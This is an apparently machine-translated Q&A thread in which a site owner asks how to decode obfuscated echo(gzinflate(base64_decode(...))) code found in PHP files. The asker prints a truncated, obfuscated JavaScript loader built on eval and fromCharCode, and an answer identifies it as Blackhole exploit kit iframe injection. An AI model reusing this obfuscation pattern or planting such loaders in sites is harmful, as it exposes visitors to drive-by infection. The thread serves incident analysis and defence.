2

さまざまな .php ファイルで がいくつか見つかっecho(gzinflate(base64_decode(".....")たので、それが正確に何をするのか興味があります。base64 -d < fileetje.b64 > fileetje.gzfileetje.b64 に文字列データが含まれている場所を使用して、引用符で囲まれたテキストをデコードできたと思います。しかし、その後、ファイルetje.gz を gunzip しようとすると、不正なデータが報告されます。また、実行するfile fileetje.gzdata、GZIP 化されたデータが似たようなものになると予想されます。

Linux コマンドラインからデータを復号化するにはどうすればよいですか?

http://www.base64online.com/のようなオンライン デコーダーもコードを理解できません。文字列データも質問に追加しても安全ですか?

更新:単純なエコー (Thnx: glglgl) にすぎないため、php スクリプトを即興で作成しました。これは出てきたものです:

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48...............

そして、それは次で終わります:

...........9~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=563;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</script>
4

1 に答える 1

2

埋め込まれた JavaScript は、ブラック ホール エクスプロイト キットの形式に従っています。エクスプロイトにつながる iFrame が挿入され、悪いニュースになる可能性があります。echo()(上記のコメントで述べたように)安全になると考えるのは真実ではありません。この関数は、埋め込まれたマルウェア コードをページに挿入して、ページに損害を与えるだけです。

関連 SO 投稿: 私のワードプレス サイトがハッキングされました。

SO Post on How It Works :この JavaScript ハックの目的は何ですか?

関連情報:

http://johnbatchelorshow.com/jb/2012/01/lessons-learned-from-the-hacking-black-hole-exploit-kit/

http://nakedsecurity.sophos.com/2012/03/29/exploring-the-blackhole-exploit-kit/

于 2012-06-02T14:15:01.270 に答える